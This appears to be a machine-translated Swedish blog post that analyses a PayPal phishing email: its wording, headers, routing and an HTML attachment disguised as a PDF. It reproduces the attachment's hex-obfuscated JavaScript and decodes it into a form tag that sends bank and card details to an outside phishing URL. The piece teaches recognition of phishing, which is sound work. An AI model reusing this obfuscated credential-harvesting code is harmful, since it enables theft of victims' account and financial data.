10Sep

Online-säkerhet: bryta ner anatomin för en phishing-e-postadress


I dagens värld där allas information är online är phishing en av de mest populära och förödande onlineattackerna, eftersom du alltid kan städa ett virus, men om dina bankuppgifter stulits har du problem. Här är en sammanfattning av en sådan attack vi fått.

Tänk inte att det bara är dina bankuppgifter som är viktiga: trots allt, om någon får kontroll över ditt kontoinloggning, känner de inte bara informationen i det kontot, men oddsen är att samma inloggningsinformation kan användas på olikaandra konton. Och om de komprometterar ditt e-postkonto kan de återställa alla dina andra lösenord.

Förutom att hålla starka och varierande lösenord, måste du alltid vara på utkik efter falska e-postmeddelanden som maskerar som den riktiga saken. Medan de flesta phishing-försök är amatöriska, är vissa ganska övertygande, så det är viktigt att förstå hur man känner igen dem på ytanivå och hur de fungerar under huven.

Bild av asirap

Undersökning Vad är i vanlig sikt

Vårt exempel-e-mail, som de flesta phishing-försök, "meddelar" dig om aktivitet på ditt PayPal-konto, vilket normalt skulle vara alarmerande. Så uppmaningen till åtgärd är att verifiera / återställa ditt konto genom att lämna in nästan alla uppgifter du kan tänka dig.Återigen är detta ganska formel.

Även om det verkligen finns undantag, är nästan alla phishing- och bluff-mail laddade med röda flaggor direkt i meddelandet själva.Även om texten är övertygande kan du vanligtvis hitta många misstag som strömmar i hela meddelandekroppen vilket tyder på att meddelandet inte är legitimt.

Meddelandekroppen

Vid första anblicken är detta en av de bättre phishing-e-postmeddelanden jag har sett. Det finns inga stavnings- eller grammatiska misstag och verbiage läser enligt vad du kan förvänta dig. Det finns dock några röda flaggor som du kan se när du granskar innehållet lite närmare.

  • "Paypal" - Rätt fall är "PayPal"( kapital P).Du kan se att båda varianterna används i meddelandet. Företagen är mycket avsiktliga med sin branding, så det är tveksamt, något sådant skulle passera korrekturprocessen.
  • "tillåta ActiveX" - Hur många gånger har du sett en legitbaserad verksamhet, storleken på Paypal använder en egen komponent som bara fungerar på en enda webbläsare, speciellt när de stöder flera webbläsare? Visst, någonstans där ute gör något företag, men det här är en röd flagga.
  • "säkert." - Lägg märke till hur detta ord inte stämmer i marginalen med resten av stycktexten.Även om jag sträcker fönstret lite mer, vrider det inte eller rymmer rätt.
  • "Paypal!" - Utrymmet före utropstecknet ser pinsamt ut. Bara en annan quirk som jag är säker på skulle inte vara i ett legitimt e-postmeddelande.
  • "PayPal-kontouppdateringsformulär.pdf.htm" - Varför skulle Paypal bifoga en "PDF", särskilt när de bara kunde länka till en sida på deras webbplats? Dessutom skulle varför de skulle försöka dölja en HTML-fil som PDF?Detta är den största röda flaggan av dem alla.

Meddelandehuvudet

När du tittar på meddelandehuvudet visas ett par röda flaggor:

  • Den från adressen är [email protected].
  • Adressen saknas. Jag har inte blankt ut det här, det är helt enkelt inte en del av standardmeddelandehuvudet. Vanligtvis kommer ett företag som har ditt namn att personifiera e-postmeddelandet till dig.

Attachment

När jag öppnar bilagan kan du omedelbart se att layouten inte är korrekt eftersom det saknas stilinformation.Återigen, varför skulle PayPal e-posta ett HTML-formulär när de helt enkelt kunde ge dig en länk på deras webbplats?

Obs! Vi använde Gmails inbyggda HTML-bilagor för detta, men vi rekommenderar att du inte öppnar bilagor från scammers. Aldrig. Någonsin. De innehåller ofta exploater som installerar trojaner på din dator för att stjäla din kontoinformation.

Scrolling lite mer kan du se att det här formuläret inte bara kräver vår PayPal-inloggningsinformation, utan också för bank- och kreditkortsinformation. Några av bilderna är trasiga.

Det är uppenbart att detta phishing-försök går efter allt med ett slag.

Den tekniska uppdelningen

Även om det borde vara ganska klart baserat på vad som är klart att detta är ett phishing-försök, kommer vi nu att bryta ner den tekniska sminken i e-postmeddelandet och se vad vi kan hitta.

Information från bilagan

Det första du tittar på är HTML-källan till bifogningsformuläret, vilket är vad som skickar data till den falska webbplatsen.

När du snabbt tittar på källan är alla länkar giltiga eftersom de pekar på antingen "paypal.com" eller "paypalobjects.com" som båda är legitiska.

Nu ska vi ta en titt på någon grundläggande sidinformation som Firefox samlar på sidan.

Som du kan se, dras en del av grafiken från domänerna "blessedtobe.com", "goodhealthpharmacy.com" och "pic-upload.de" istället för de legitala PayPal-domänerna.

Information från e-postrubrikerna

Nedan följer en titt på de raka e-postmeddelandena. Gmail gör det tillgängligt via menyalternativet Visa original på meddelandet.

Om du tittar på huvudinformationen för det ursprungliga meddelandet kan du se att detta meddelande har komponerats med Outlook Express 6. Jag tvivlar på att PayPal har någon på personalen som skickar var och en av dessa meddelanden manuellt via en föråldrad e-postklient.

När vi nu tittar på rutningsinformationen kan vi se IP-adressen till både avsändaren och den reläerande mail-servern.

"Användar" IP-adressen är den ursprungliga avsändaren. Genom att snabbt titta på IP-informationen kan vi se att den sändande IP-adressen är i Tyskland.

Och när vi ser på relaying-postserverns( mail.itak.at), kan IP-adressen vi ser här vara en ISP baserad i Österrike. Jag tvivlar på att PayPal sänder sina e-postmeddelanden direkt via en Österrike-baserad Internetleverantör när de har en massiv servergård som lätt kan hantera denna uppgift.

Var går dataen?

Så vi har klart bestämt att det här är ett phishing-e-postmeddelande och samlat in en del information om var meddelandet härrörde, men hur är din data skickad?

För att se detta måste vi först spara HTM-bilagan, gör skrivbordet och öppna det i en textredigerare. Bläddra igenom det ser allt ut att vara i ordning förutom när vi kommer till ett misstänksamt utseende Javascript-block.

Att bryta ut hela källan till det sista blocket av Javascript, vi ser:

& lt; script language = "JavaScript" type = "text / javascript" & gt;
// Copyright © 2005 Voormedia - WWW.VOORMEDIA.COM
var i, y, x =”3c666f726d206e616d653d226d61696e222069643d226d61696e22206d6574686f643d22706f73742220616374696f6e3d22687474703a2f2f7777772e646578706f737572652e6e65742f6262732f646174612f7665726966792e706870223e”; y =”; for( i = 0; i & lt; x.length; i + = 2){ y + = unescape( '%' + x.substr( i, 2));} document.write( y);
& lt; / script & gt;

Närhelst du ser en stor jumbled sträng av till synes slumpmässiga bokstäver och siffror inbäddade i ett Javascript-block, är det vanligtvis något misstänkt. När man tittar på koden ställs variabeln "x" på den här stora strängen och avkodas sedan till variabeln "y".Slutresultatet av variabel "y" skrivs sedan till dokumentet som HTML.

Eftersom stora strängen är gjord av siffrorna 0-9 och bokstäverna AF, är det med största sannolikhet kodas via en enkel ASCII till Hex konvertering:

3c666f726d206e616d653d226d61696e222069643d226d61696e22206d6574686f643d22706f73742220616374696f6e3d22687474703a2f2f7777772e646578706f737572652e6e65742f6262732f646174612f7665726966792e706870223e

översättas till:

& lt; formen name =”main” id =”main”metod = "post" action = "http: //www.dexposure.net/bbs/data/ verifiera.php" & gt;

Det är inte en slump att det här avkodas till en giltig HTML-formtagg som skickar resultaten till inte PayPal, utan till en skurkplats.

När du ser HTML-källan till formuläret ser du att denna formulärtagg inte är synlig eftersom den genereras dynamiskt via Javascript. Det här är ett smart sätt att dölja vad HTML verkligen gör om någon bara skulle se den genererade källan till bilagan( som vi gjorde tidigare) i motsats till att bilagan öppnades direkt i en textredigerare.

Att köra en snabb whois på den förekommande webbplatsen, vi kan se här är en domän värd på en populär webbhotell, 1and1.

Vad som står ut är att domänen använder ett läsbart namn( i motsats till något som "dfh3sjhskjhw.net") och domänen har registrerats i 4 år. På grund av detta tror jag att den här domänen kapades och användes som en bonde i det här phishing-försöket.

Cynicism är ett bra försvar

När det gäller att vara säker på nätet gör det aldrig ont för att ha en bra bit av cynicism.

Medan jag är säker på att det finns fler röda flaggor i exemplet e-post, är det vi påpekade ovan indikatorer som vi såg efter några få minuter av undersökningen. Hypotetiskt, om e-postens yta nivå efterliknade sin legitima motsvarighet 100%, skulle den tekniska analysen fortfarande avslöja sin sanna natur. Det är därför som det importeras för att kunna undersöka både vad du kan och inte kan se.